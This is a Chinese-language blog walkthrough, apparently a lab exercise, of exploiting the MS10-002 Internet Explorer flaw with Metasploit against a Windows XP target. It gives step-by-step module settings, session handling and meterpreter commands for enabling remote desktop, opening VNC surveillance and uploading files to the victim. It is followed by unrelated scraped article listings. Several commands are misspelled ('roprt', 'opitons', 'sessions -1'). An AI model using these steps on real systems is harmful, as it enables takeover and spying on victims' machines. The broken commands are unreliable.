MS10_002漏洞利用

漏洞披露

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-002

漏洞原理

针对Internet Explorer“极光”内存损坏的攻击
也就是IE浏览器漏洞
影响范围:见上方链接
(之前测试过win7,发现win7各个版本的IE都失败了,xp是成功了,建议以xp做靶机)

漏洞利用

攻击方:192.168.216.139(kali linux)
靶机:192.168.216.141(windows xp)
1.使用MSF框架


设置目标靶机ip地址和端口(端口随便填,只要kali上这个端口未被使用即可)

show opitons
set rhost 192.168.216.141
set roprt 1136
run

如果运行后未显示session(如下图所示),就代表失败

如果成功了就像下图
运行后把目标网址复制到xp的IE浏览器上访问即可看到kali有反馈

接着使用sessions -i即可看到目标主机
使用sessions -1使用即可进入到metetpreter
使用ipconfig即可看到目标主机ip

这样xp系统就被控制了

meterpreter板块

除了ipconfig之外,meterpreter还可以使用很多功能
例如打开VNC(监控软件)
首先需要开启靶机远程桌面

run getgui -e
run vnc

等一会就可以弹出VNC界面

或者使用上传或者下载文件(这里上传kali一个文件到xp)
upload kali目标文件路径 xp要放的文件路径

upload /user/123.txt c:/txt

有关meterpreter暂时先说到这里
还有许多例如端口转发,打开问价等都可以试试

MS10_002漏洞利用相关推荐

  1. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

  2. 流行漏洞利用工具包瞄准Flash、Java和IE

    Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...

  3. Flash Player漏洞利用Exploiting Flash Reliably

    以下消息来自幻影论坛[Ph4nt0m]邮件组   前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...

  4. 溢出漏洞利用小结(基础)

    shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...

  5. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  6. ASP.net 资源请求漏洞利用工具PadBuster

    ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...

  7. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

    ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...

  8. S2-045漏洞利用工具解决方案

    S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...

  9. WPS漏洞利用工具Bully常见命令集合

    WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.

最新文章

  1. APUE 学习笔记 - Chapter 6. System Data File and Infomation
  2. SSM项目各层单元测试
  3. ExtJS 的工具条及菜单
  4. springmvc+mybatis+dubbo+zookeeper分布式架构
  5. mysql表还原初始状态_workbench 怎么恢复初始设置
  6. 【英语学习】【WOTD】sequester 释义/词源/示例
  7. 3-点的坐标及最远距离问题
  8. 《异星入境》-超粒方
  9. python matplot模块
  10. [转载] python+selenium定时爬取丁香园的新冠病毒每天的数据,并制作出类似的地图(部署到云服务器)
  11. 485通讯测试软件,Modbus 测试工具| Modbus 通信测试软件
  12. 数据处理笔记6:缺失值填充
  13. 从零编写基于MATLAB的GNSS_SDR程序(GNSS软件接收机)——学习记录(2)
  14. 云计算未来的发展前景和就业前景怎么样?
  15. E0864vector不是模板
  16. DXT纹理压缩格式解析
  17. SQL Server 数据库对象
  18. Flash视频播放器flowplayer的使用
  19. Unity - DOTween库的使用问题
  20. fetch下载文件--统一拦截导出文件

热门文章

  1. Python与Spark大数据
  2. MIT-BIH ECG 信号的数据读取方法和Matlab程序
  3. 斯坦福大学 Design School 所倡导设计思维的原则和步骤是什么?
  4. 怎么下载不允许下载的东西
  5. LED大屏分屏专业播放软件vMix Pro 19版一键和谐补丁永久使用
  6. 中欧医疗基金数据分析(葛兰)——Python
  7. html小游戏色,【HTML小游戏】找色差游戏,没事儿可以解解闷(附源代码)
  8. PCGBooK第一章 阅读笔记
  9. 雨流计数法Matlab代码
  10. jupyter常用快捷键一览